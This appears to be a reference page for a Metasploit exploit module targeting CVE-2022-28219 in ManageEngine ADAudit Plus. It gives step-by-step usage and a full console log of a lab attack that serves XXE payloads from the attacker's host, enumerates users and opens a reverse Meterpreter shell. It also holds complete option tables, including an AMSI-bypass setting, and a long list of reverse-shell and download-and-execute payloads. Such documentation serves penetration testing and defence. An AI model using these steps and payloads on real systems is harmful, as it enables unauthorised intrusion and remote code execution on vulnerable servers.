ManageEngine ADAudit Plus CVE-2022-28219 - Metasploit
This page contains detailed information about how to use the exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219 metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: ManageEngine ADAudit Plus CVE-2022-28219
Module: exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219
Source code: modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb
Disclosure date: 2022-06-29
Last modification time: 2022-08-05 11:34:46 +0000
Supported architecture(s): cmd
Supported platform(s): Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8081, 8443, 8880, 8888
List of CVEs: CVE-2022-28219
This module exploits CVE-2022-28219, which is a pair of vulnerabilities in ManageEngine ADAudit Plus versions before build 7060: a path traversal in the /cewolf endpoint, and a blind XXE in, to upload and execute an executable file.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
msf > use exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219
msf exploit(manageengine_adaudit_plus_cve_2022_28219) > exploit
Required Options
RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
DOMAIN: Active Directory domain that the target monitors
Knowledge Base
Vulnerable Application
The vulnerable application is ManageEngine ADAudit Plus prior to build 7060. I built and tested this on build 7055, which, at least at the time of this writing, you can download here. It's a .exe file that you can install with all the defaults.
You also need to configure ADAudit to actually audit a domain. That means setting up a domain (I created a domain controller in the lab), and configuring ADAudit to scan that domain. That domain name must be set to the DOMAIN
when using this exploit.
The last thing is, three connect-back ports must be open from the target back to Metasploit (in addition to whatever payload ports). By default, we use ports 8080 and 8888 for HTTP, and 2121 for FTP.
Verification Steps
- Install the application
- Do:
set RHOSTS <IP>
- Do:
set DOMAIN <DOMAIN_NAME>
- Do:
exploit
- You should get a meterpreter session
Scenarios
msf6 > use exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219
[*] No payload configured, defaulting to cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > set RHOSTS 10.0.0.148
RHOSTS => 10.0.0.148
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > set DOMAIN ad.example.local
DOMAIN => ad.example.local
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > exploit
[*] Started reverse TCP handler on 10.0.0.146:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. The vulnerable endpoint responds with HTTP/200.
[*] Attempting to exploit XXE to get a list of users
[*] Using URL: http://10.0.0.146:8080/KEmvnPFxS.dtd
[*] User accounts discovered: Ron
[*] Enumerating old payloads cached on the server (to skip later)
[*] Using URL: http://10.0.0.146:8080/NvkXTJXRyhV.dtd
[*] Attempting to exploit XXE to store our serialized payload on the server
[*] Trying to find our payload in all users' temp folders
[*] Using URL: http://10.0.0.146:8080/ppVHiihu.dtd
[*] Executing payload: /users/Ron/appdata/local/temp/jar_cache4413164256015023251.tmp...
[*] Sending stage (175686 bytes) to 10.0.0.148
[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.148:52347) at 2022-07-07 15:19:59 -0700
meterpreter >
Options
TARGETURI_DESERIALIZATION / TARGETURI_XXE
The target URLs - probably won't ever need to be changed
DOMAIN
A domain that the target monitors. We cannot validate this, but if the exploit should work and doesn't, this might be the issue.
SRVPORT / SRVPORT_FTP / SRVPORT_HTTP2
The connect-back ports.
SRVPORT
is used to host XXE payloadsSRVPORT_HTTP2
is used for an XXE payload that is held open, creating a temporary file on the serverSRVPORT_FTP
is used for a fake off-spec FTP server that receives a directory listing also via XXE
PATH_TRAVERSAL_DEPTH
The number of ../
to add to the request
FtpCallbackTimeout / HttpUploadTimeout
How long to wait for FTP or HTTP responses before giving up
Go back to menu.
Msfconsole Usage
Here is how the windows/http/manageengine_adaudit_plus_cve_2022_28219 exploit module looks in the msfconsole:
msf6 > use exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219
[*] No payload configured, defaulting to cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > show info
Name: ManageEngine ADAudit Plus CVE-2022-28219
Module: exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219
Platform: Windows
Arch: cmd
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2022-06-29
Provided by:
Naveen Sunkavally
Ron Bowes
Module side effects:
ioc-in-logs
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Windows Command
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN yes Active Directory domain that the target monitors
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi
ng-Metasploit
RPORT 8081 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on th
e local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SRVPORT_FTP 2121 yes Port for FTP reverse connection
SRVPORT_HTTP2 8888 yes Port for additional HTTP reverse connections
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI_DESERIALIZATION /cewolf/logo.png yes Path traversal and unsafe deserialization endpoint
TARGETURI_XXE /api/agent/tabs/agentData yes XXE endpoint
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload information:
Description:
This module exploits CVE-2022-28219, which is a pair of
vulnerabilities in ManageEngine ADAudit Plus versions before build
7060: a path traversal in the /cewolf endpoint, and a blind XXE in,
to upload and execute an executable file.
References:
https://nvd.nist.gov/vuln/detail/CVE-2022-28219
https://www.horizon3.ai/red-team-blog-cve-2022-28219/
https://attackerkb.com/topics/Zx3qJlmRGY/cve-2022-28219/rapid7-analysis
https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
Module Options
This is a complete list of options available in the windows/http/manageengine_adaudit_plus_cve_2022_28219 exploit:
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > show options
Module options (exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN yes Active Directory domain that the target monitors
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Us
ing-Metasploit
RPORT 8081 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on t
he local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SRVPORT_FTP 2121 yes Port for FTP reverse connection
SRVPORT_HTTP2 8888 yes Port for additional HTTP reverse connections
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI_DESERIALIZATION /cewolf/logo.png yes Path traversal and unsafe deserialization endpoint
TARGETURI_XXE /api/agent/tabs/agentData yes XXE endpoint
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (cmd/windows/powershell/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.126 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows Command
Advanced Options
Here is a complete list of advanced options supported by the windows/http/manageengine_adaudit_plus_cve_2022_28219 exploit:
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > show advanced
Module advanced options (exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
CMDSTAGER::DECODER no The decoder stub to use.
CMDSTAGER::FLAVOR auto no The CMD Stager to use. (Accepted: auto, bourne, debug_asm, d
ebug_write, echo, printf, vbs, vbs_adodb, certutil, tftp, wg
et, curl, fetch, lwprequest, psh_invokewebrequest, ftp_http)
CMDSTAGER::SSL false no Use SSL/TLS for supported stagers
CMDSTAGER::TEMP no Writable directory for staged files
CMDSTAGER::URIPATH no Payload URI path for supported stagers
ContextInformationFile no The information file that contains context information
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to fa
lse for non-IIS servers
DisablePayloadHandler false no Disable the handler code for the selected payload
EXE::Custom no Use custom exe instead of automatically generating a payload
exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missin
g
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
ForceExploit false no Override check result
FtpCallbackTimeout 5 yes The amount of time, in seconds, the FTP server will wait for
a reverse connection
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing he
aders
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to dis
able)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUploadTimeout 5 yes The amount of time, in seconds, the HTTP file-upload server
will wait for a reverse connection
HttpUsername no The HTTP username to specify for authentication
ListenerBindAddress no The specific IP address to bind to if different from SRVHOST
ListenerBindPort no The port to bind to if different from SRVPORT
ListenerComm no The specific communication channel to use for this service
MSI::Custom no Use custom msi instead of automatically generating a payload
msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if acce
pted)
PATH_TRAVERSAL_DEPTH 20 yes The number of `../` to prepend to the path traversal attempt
Powershell::encode_final_payload false yes Encode final payload for -EncodedCommand
Powershell::encode_inner_payload false yes Encode inner payload for -EncodedCommand
Powershell::exec_in_place false yes Produce PSH without executable wrapper
Powershell::exec_rc4 false yes Encrypt PSH with RC4
Powershell::method reflection yes Payload delivery method (Accepted: net, reflection, old, msi
l)
Powershell::no_equals false yes Pad base64 until no "=" remains
Powershell::noninteractive true yes Execute powershell without interaction
Powershell::persist false yes Run the payload in a loop
Powershell::prepend_protections_by auto yes Prepend AMSI/SBL bypass (Accepted: auto, true, false)
pass
Powershell::prepend_sleep no Prepend seconds of sleep
Powershell::remove_comspec false yes Produce script calling powershell directly
Powershell::strip_comments true yes Strip comments
Powershell::strip_whitespace false yes Strip whitespace
Powershell::sub_funcs false yes Substitute function names
Powershell::sub_vars true yes Substitute variable names
Powershell::wrap_double_quotes true yes Wraps the -Command argument in single quotes
ReverseListenerComm no The specific communication channel to use for this listener
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
SSLServerNameIndication no SSL/TLS Server Name Indication (SNI)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL
23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TL
S1, TLS1.1, TLS1.2)
SendRobots false no Return a robots.txt file if asked for one
URIHOST no Host to use in URI (useful for tunnels)
URIPORT no Port to use in URI (useful for tunnels)
UserAgent Mozilla/5.0 (Macintosh; Intel Mac no The User-Agent header to use for all requests
OS X 12.2; rv:97.0) Gecko/20100101
Firefox/97.0
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (cmd/windows/powershell/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://github.com/rapid7/meta
sploit-framework/wiki/Meterpreter-Debugging-Meterpreter-Sessions
PayloadBindPort no Port to bind reverse tcp socket to on target system.
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
Powershell::encode_final_payload false yes Encode final payload for -EncodedCommand
Powershell::encode_inner_payload false yes Encode inner payload for -EncodedCommand
Powershell::exec_in_place false yes Produce PSH without executable wrapper
Powershell::exec_rc4 false yes Encrypt PSH with RC4
Powershell::method reflection yes Payload delivery method (Accepted: net, reflection, old, msil)
Powershell::no_equals false yes Pad base64 until no "=" remains
Powershell::noninteractive true yes Execute powershell without interaction
Powershell::persist false yes Run the payload in a loop
Powershell::prepend_protections_by auto yes Prepend AMSI/SBL bypass (Accepted: auto, true, false)
pass
Powershell::prepend_sleep no Prepend seconds of sleep
Powershell::remove_comspec false yes Produce script calling powershell directly
Powershell::strip_comments true yes Strip comments
Powershell::strip_whitespace false yes Strip whitespace
Powershell::sub_funcs false yes Substitute function names
Powershell::sub_vars true yes Substitute variable names
Powershell::wrap_double_quotes true yes Wraps the -Command argument in single quotes
PrependMigrate false yes Spawns and runs shellcode in new process
PrependMigrateProc no Process to spawn and run shellcode in
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through
proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding i
s set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the windows/http/manageengine_adaudit_plus_cve_2022_28219 module can exploit:
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > show targets
Exploit targets:
Id Name
-- ----
0 Windows Command
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the windows/http/manageengine_adaudit_plus_cve_2022_28219 exploit:
msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/windows/adduser normal No Windows Execute net user /ADD CMD
1 payload/cmd/windows/bind_lua normal No Windows Command Shell, Bind TCP (via Lua)
2 payload/cmd/windows/bind_perl normal No Windows Command Shell, Bind TCP (via Perl)
3 payload/cmd/windows/bind_perl_ipv6 normal No Windows Command Shell, Bind TCP (via perl) IPv6
4 payload/cmd/windows/bind_ruby normal No Windows Command Shell, Bind TCP (via Ruby)
5 payload/cmd/windows/download_eval_vbs normal No Windows Executable Download and Evaluate VBS
6 payload/cmd/windows/download_exec_vbs normal No Windows Executable Download and Execute (via .vbs)
7 payload/cmd/windows/generic normal No Windows Command, Generic Command Execution
8 payload/cmd/windows/jjs_reverse_tcp normal No Windows Shell, Reverse TCP (via jjs)
9 payload/cmd/windows/powershell/custom/bind_hidden_ipknock_tcp normal No Powershell Exec, Windows shellcode stage, Hidden Bind Ipknock TCP Stager
10 payload/cmd/windows/powershell/custom/bind_hidden_tcp normal No Powershell Exec, Windows shellcode stage, Hidden Bind TCP Stager
11 payload/cmd/windows/powershell/custom/bind_ipv6_tcp normal No Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)
12 payload/cmd/windows/powershell/custom/bind_ipv6_tcp_uuid normal No Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager with UUID Support (Windows x86)
13 payload/cmd/windows/powershell/custom/bind_named_pipe normal No Powershell Exec, Windows shellcode stage, Windows x86 Bind Named Pipe Stager
14 payload/cmd/windows/powershell/custom/bind_nonx_tcp normal No Powershell Exec, Windows shellcode stage, Bind TCP Stager (No NX or Win7)
15 payload/cmd/windows/powershell/custom/bind_tcp normal No Powershell Exec, Windows shellcode stage, Bind TCP Stager (Windows x86)
16 payload/cmd/windows/powershell/custom/bind_tcp_rc4 normal No Powershell Exec, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)
17 payload/cmd/windows/powershell/custom/bind_tcp_uuid normal No Powershell Exec, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x86)
18 payload/cmd/windows/powershell/custom/reverse_hop_http normal No Powershell Exec, Windows shellcode stage, Reverse Hop HTTP/HTTPS Stager
19 payload/cmd/windows/powershell/custom/reverse_http normal No Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (wininet)
20 payload/cmd/windows/powershell/custom/reverse_http_proxy_pstore normal No Powershell Exec, Windows shellcode stage, Reverse HTTP Stager Proxy
21 payload/cmd/windows/powershell/custom/reverse_https normal No Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (wininet)
22 payload/cmd/windows/powershell/custom/reverse_https_proxy normal No Powershell Exec, Windows shellcode stage, Reverse HTTPS Stager with Support for Custom Proxy
23 payload/cmd/windows/powershell/custom/reverse_ipv6_tcp normal No Powershell Exec, Windows shellcode stage, Reverse TCP Stager (IPv6)
24 payload/cmd/windows/powershell/custom/reverse_named_pipe normal No Powershell Exec, Windows shellcode stage, Windows x86 Reverse Named Pipe (SMB) Stager
25 payload/cmd/windows/powershell/custom/reverse_nonx_tcp normal No Powershell Exec, Windows shellcode stage, Reverse TCP Stager (No NX or Win7)
26 payload/cmd/windows/powershell/custom/reverse_ord_tcp normal No Powershell Exec, Windows shellcode stage, Reverse Ordinal TCP Stager (No NX or Win7)
27 payload/cmd/windows/powershell/custom/reverse_tcp normal No Powershell Exec, Windows shellcode stage, Reverse TCP Stager
28 payload/cmd/windows/powershell/custom/reverse_tcp_allports normal No Powershell Exec, Windows shellcode stage, Reverse All-Port TCP Stager
29 payload/cmd/windows/powershell/custom/reverse_tcp_dns normal No Powershell Exec, Windows shellcode stage, Reverse TCP Stager (DNS)
30 payload/cmd/windows/powershell/custom/reverse_tcp_rc4 normal No Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
31 payload/cmd/windows/powershell/custom/reverse_tcp_rc4_dns normal No Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
32 payload/cmd/windows/powershell/custom/reverse_tcp_uuid normal No Powershell Exec, Windows shellcode stage, Reverse TCP Stager with UUID Support
33 payload/cmd/windows/powershell/custom/reverse_udp normal No Powershell Exec, Windows shellcode stage, Reverse UDP Stager with UUID Support
34 payload/cmd/windows/powershell/custom/reverse_winhttp normal No Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (winhttp)
35 payload/cmd/windows/powershell/custom/reverse_winhttps normal No Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (winhttp)
36 payload/cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp normal No Powershell Exec, Hidden Bind Ipknock TCP Stager
37 payload/cmd/windows/powershell/dllinject/bind_hidden_tcp normal No Powershell Exec, Hidden Bind TCP Stager
38 payload/cmd/windows/powershell/dllinject/bind_ipv6_tcp normal No Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
39 payload/cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid normal No Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
40 payload/cmd/windows/powershell/dllinject/bind_named_pipe normal No Powershell Exec, Windows x86 Bind Named Pipe Stager
41 payload/cmd/windows/powershell/dllinject/bind_nonx_tcp normal No Powershell Exec, Bind TCP Stager (No NX or Win7)
42 payload/cmd/windows/powershell/dllinject/bind_tcp normal No Powershell Exec, Bind TCP Stager (Windows x86)
43 payload/cmd/windows/powershell/dllinject/bind_tcp_rc4 normal No Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
44 payload/cmd/windows/powershell/dllinject/bind_tcp_uuid normal No Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
45 payload/cmd/windows/powershell/dllinject/reverse_hop_http normal No Powershell Exec, Reverse Hop HTTP/HTTPS Stager
46 payload/cmd/windows/powershell/dllinject/reverse_http normal No Powershell Exec, Windows Reverse HTTP Stager (wininet)
47 payload/cmd/windows/powershell/dllinject/reverse_http_proxy_pstore normal No Powershell Exec, Reverse HTTP Stager Proxy
48 payload/cmd/windows/powershell/dllinject/reverse_ipv6_tcp normal No Powershell Exec, Reverse TCP Stager (IPv6)
49 payload/cmd/windows/powershell/dllinject/reverse_nonx_tcp normal No Powershell Exec, Reverse TCP Stager (No NX or Win7)
50 payload/cmd/windows/powershell/dllinject/reverse_ord_tcp normal No Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
51 payload/cmd/windows/powershell/dllinject/reverse_tcp normal No Powershell Exec, Reverse TCP Stager
52 payload/cmd/windows/powershell/dllinject/reverse_tcp_allports normal No Powershell Exec, Reverse All-Port TCP Stager
53 payload/cmd/windows/powershell/dllinject/reverse_tcp_dns normal No Powershell Exec, Reverse TCP Stager (DNS)
54 payload/cmd/windows/powershell/dllinject/reverse_tcp_rc4 normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
55 payload/cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
56 payload/cmd/windows/powershell/dllinject/reverse_tcp_uuid normal No Powershell Exec, Reverse TCP Stager with UUID Support
57 payload/cmd/windows/powershell/dllinject/reverse_winhttp normal No Powershell Exec, Windows Reverse HTTP Stager (winhttp)
58 payload/cmd/windows/powershell/dns_txt_query_exec normal No Powershell Exec, DNS TXT Record Payload Download and Execution
59 payload/cmd/windows/powershell/download_exec normal No Powershell Exec, Windows Executable Download (http,https,ftp) and Execute
60 payload/cmd/windows/powershell/exec normal No Powershell Exec
61 payload/cmd/windows/powershell/generic/debug_trap normal No Powershell Exec, Generic x86 Debug Trap
62 payload/cmd/windows/powershell/generic/tight_loop normal No Powershell Exec, Generic x86 Tight Loop
63 payload/cmd/windows/powershell/loadlibrary normal No Powershell Exec
64 payload/cmd/windows/powershell/messagebox normal No Powershell Exec, Windows MessageBox
65 payload/cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp normal No Powershell Exec, Hidden Bind Ipknock TCP Stager
66 payload/cmd/windows/powershell/meterpreter/bind_hidden_tcp normal No Powershell Exec, Hidden Bind TCP Stager
67 payload/cmd/windows/powershell/meterpreter/bind_ipv6_tcp normal No Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
68 payload/cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid normal No Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
69 payload/cmd/windows/powershell/meterpreter/bind_named_pipe normal No Powershell Exec, Windows x86 Bind Named Pipe Stager
70 payload/cmd/windows/powershell/meterpreter/bind_nonx_tcp normal No Powershell Exec, Bind TCP Stager (No NX or Win7)
71 payload/cmd/windows/powershell/meterpreter/bind_tcp normal No Powershell Exec, Bind TCP Stager (Windows x86)
72 payload/cmd/windows/powershell/meterpreter/bind_tcp_rc4 normal No Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
73 payload/cmd/windows/powershell/meterpreter/bind_tcp_uuid normal No Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
74 payload/cmd/windows/powershell/meterpreter/reverse_hop_http normal No Powershell Exec, Reverse Hop HTTP/HTTPS Stager
75 payload/cmd/windows/powershell/meterpreter/reverse_http normal No Powershell Exec, Windows Reverse HTTP Stager (wininet)
76 payload/cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore normal No Powershell Exec, Reverse HTTP Stager Proxy
77 payload/cmd/windows/powershell/meterpreter/reverse_https normal No Powershell Exec, Windows Reverse HTTPS Stager (wininet)
78 payload/cmd/windows/powershell/meterpreter/reverse_https_proxy normal No Powershell Exec, Reverse HTTPS Stager with Support for Custom Proxy
79 payload/cmd/windows/powershell/meterpreter/reverse_ipv6_tcp normal No Powershell Exec, Reverse TCP Stager (IPv6)
80 payload/cmd/windows/powershell/meterpreter/reverse_named_pipe normal No Powershell Exec, Windows x86 Reverse Named Pipe (SMB) Stager
81 payload/cmd/windows/powershell/meterpreter/reverse_nonx_tcp normal No Powershell Exec, Reverse TCP Stager (No NX or Win7)
82 payload/cmd/windows/powershell/meterpreter/reverse_ord_tcp normal No Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
83 payload/cmd/windows/powershell/meterpreter/reverse_tcp normal No Powershell Exec, Reverse TCP Stager
84 payload/cmd/windows/powershell/meterpreter/reverse_tcp_allports normal No Powershell Exec, Reverse All-Port TCP Stager
85 payload/cmd/windows/powershell/meterpreter/reverse_tcp_dns normal No Powershell Exec, Reverse TCP Stager (DNS)
86 payload/cmd/windows/powershell/meterpreter/reverse_tcp_rc4 normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
87 payload/cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
88 payload/cmd/windows/powershell/meterpreter/reverse_tcp_uuid normal No Powershell Exec, Reverse TCP Stager with UUID Support
89 payload/cmd/windows/powershell/meterpreter/reverse_winhttp normal No Powershell Exec, Windows Reverse HTTP Stager (winhttp)
90 payload/cmd/windows/powershell/meterpreter/reverse_winhttps normal No Powershell Exec, Windows Reverse HTTPS Stager (winhttp)
91 payload/cmd/windows/powershell/metsvc_bind_tcp normal No Powershell Exec, Windows Meterpreter Service, Bind TCP
92 payload/cmd/windows/powershell/metsvc_reverse_tcp normal No Powershell Exec, Windows Meterpreter Service, Reverse TCP Inline
93 payload/cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp normal No Powershell Exec, Hidden Bind Ipknock TCP Stager
94 payload/cmd/windows/powershell/patchupdllinject/bind_hidden_tcp normal No Powershell Exec, Hidden Bind TCP Stager
95 payload/cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp normal No Powershell Exec, Bind IPv6 TCP Stager (Windows x86)
96 payload/cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid normal No Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)
97 payload/cmd/windows/powershell/patchupdllinject/bind_named_pipe normal No Powershell Exec, Windows x86 Bind Named Pipe Stager
98 payload/cmd/windows/powershell/patchupdllinject/bind_nonx_tcp normal No Powershell Exec, Bind TCP Stager (No NX or Win7)
99 payload/cmd/windows/powershell/patchupdllinject/bind_tcp normal No Powershell Exec, Bind TCP Stager (Windows x86)
100 payload/cmd/windows/powershell/patchupdllinject/bind_tcp_rc4 normal No Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)
101 payload/cmd/windows/powershell/patchupdllinject/bind_tcp_uuid normal No Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)
102 payload/cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp normal No Powershell Exec, Reverse TCP Stager (IPv6)
103 payload/cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp normal No Powershell Exec, Reverse TCP Stager (No NX or Win7)
104 payload/cmd/windows/powershell/patchupdllinject/reverse_ord_tcp normal No Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)
105 payload/cmd/windows/powershell/patchupdllinject/reverse_tcp normal No Powershell Exec, Reverse TCP Stager
106 payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_allports normal No Powershell Exec, Reverse All-Port TCP Stager
107 payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_dns normal No Powershell Exec, Reverse TCP Stager (DNS)
108 payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4 normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
109 payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns normal No Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
110 payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid normal No Powershell Exec, Reverse TCP Stager with UUID Support
